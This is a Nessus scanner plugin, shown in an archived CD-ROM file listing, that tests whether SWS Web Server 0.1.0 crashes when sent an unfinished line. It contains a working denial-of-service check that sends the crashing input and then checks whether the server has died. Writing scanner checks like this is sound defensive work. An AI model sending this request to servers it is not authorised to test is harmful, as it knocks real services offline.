home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / SWS_DoS.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  78 lines

  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>
  3. #
  4. # GNU Public Licence
  5. #
  6. #
  7. # Modifications by rd:
  8. #
  9. #    - Removed the numerous (and slow) calls to send() and recv()
  10. #      because the original exploit states that sending just one
  11. #      request will crash the server
  12. #
  13. ########################
  14. # References:
  15. ########################
  16. #
  17. # Message-Id: <200209021802.g82I2Vd48012@mailserver4.hushmail.com>
  18. # Date: Mon, 2 Sep 2002 11:02:31 -0700
  19. # To: vulnwatch@vulnwatch.org
  20. # From: saman@hush.com
  21. # Subject: [VulnWatch] SWS Web Server v0.1.0 Exploit
  22. #
  23. ########################
  24. #
  25. # Vulnerables:
  26. # SWS Web Server v0.1.0
  27. #
  28.  
  29. if(description)
  30. {
  31.  script_id(11171);
  32.  script_bugtraq_id(5664);
  33.  script_version("$Revision: 1.10 $");
  34.  
  35.  name["english"] = "HTTP unfinished line denial";
  36.  script_name(english:name["english"]);
  37.  
  38.  desc["english"] = "
  39. We could crash the remote web server by sending an unfinished line.
  40. (ie: |Nessus| without a return carriage at the end of the line).
  41.  
  42. A cracker may exploit this flaw to disable this service.
  43.  
  44.  
  45. Risk factor : High
  46. Solution : Upgrade your web server";
  47.  
  48.  script_description(english:desc["english"]);
  49.  
  50.  summary["english"] = "SWS web server crashes when unfinished line is sent";
  51.  script_summary(english:summary["english"]);
  52.  
  53.  script_category(ACT_DENIAL);
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
  56.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  57.  family["english"] = "Denial of Service";
  58.  family["francais"] = "DΘni de service";
  59.  script_family(english:family["english"], francais:family["francais"]);
  60.  script_dependencie("find_service.nes", "httpver.nasl");
  61.  script_require_ports("Services/www",80);
  62.  exit(0);
  63. }
  64.  
  65. #
  66. include("http_func.inc");
  67.  
  68. port = get_http_port(default:80);
  69.  
  70. if (!get_port_state(port)) exit(0);
  71.  
  72. if(http_is_dead(port:port))exit(0);
  73. soc = http_open_socket(port);
  74. if (!soc) exit(0);
  75. send(socket:soc, data:"|Nessus|");
  76. http_close_socket(soc);
  77. if(http_is_dead(port:port, retry:3))security_hole(port);
  78.